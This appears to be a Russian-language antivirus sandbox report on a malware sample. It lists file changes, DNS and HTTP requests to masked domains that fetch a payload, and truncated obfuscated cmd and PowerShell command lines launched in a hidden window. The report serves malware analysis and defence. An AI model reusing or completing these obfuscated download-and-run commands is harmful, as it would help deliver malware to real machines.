Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c Cmd /C "sEt DIy=$8230C =[CHaR[]] ") )93]rAHC[,)84]rAHC[+701]rAHC[+28]rAHC[(EcaLPErC- 63]rAHC[,'Q8h' EcaLPErC-421]rAHC[,)99]rAHC[+411]rAHC[+201]rAHC[( EcaLPErC-)'nOi'+'ss'+'eR'+'pXE-ekO...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\431.exe
Удаляет следующие файлы
- %TEMP%\431.exe
Сетевая активность
Подключается к
- 'cr#####acialhealth.com':80
- 'ci##erme.pl':80
- 'du##n.net':80
- 'di###sgang.com':80
TCP
Запросы HTTP GET
- http://cr#####acialhealth.com/fkwoBvLXu9
- http://cr#####acialhealth.com/cgi-sys/suspendedpage.cgi
- http://ci##erme.pl/data/FUqfiGggE
UDP
- DNS ASK cr#####acialhealth.com
- DNS ASK ci##erme.pl
- DNS ASK du##n.net
- DNS ASK di###sgang.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c Cmd /C "sEt DIy=$8230C =[CHaR[]] ") )93]rAHC[,)84]rAHC[+701]rAHC[+28]rAHC[(EcaLPErC- 63]rAHC[,'Q8h' EcaLPErC-421]rAHC[,)99]rAHC[+411]rAHC[+201]rAHC[( EcaLPErC-)'nOi'+'ss'+'eR'+'pXE-ekO...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "sEt DIy=$8230C =[CHaR[]] ") )93]rAHC[,)84]rAHC[+701]rAHC[+28]rAHC[(EcaLPErC- 63]rAHC[,'Q8h' EcaLPErC-421]rAHC[,)99]rAHC[+411]rAHC[+201]rAHC[( EcaLPErC-)'nOi'+'ss'+'eR'+'pXE-ekOVNI '+'cr...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' SEt-ItEm ('V' + 'ARiAb'+'lE:SKeAil') ( [TYPe]( \"{2}{3}{1}{0}\"-F't','n','ENvIRon','ME' ) ) ; ( .('ls') ( \"{4}{0}{7}{1}{5}{2}{3}{6}\"-f'B','E:E','co','NteX','VarIA','XEcUTiOn','t','l...
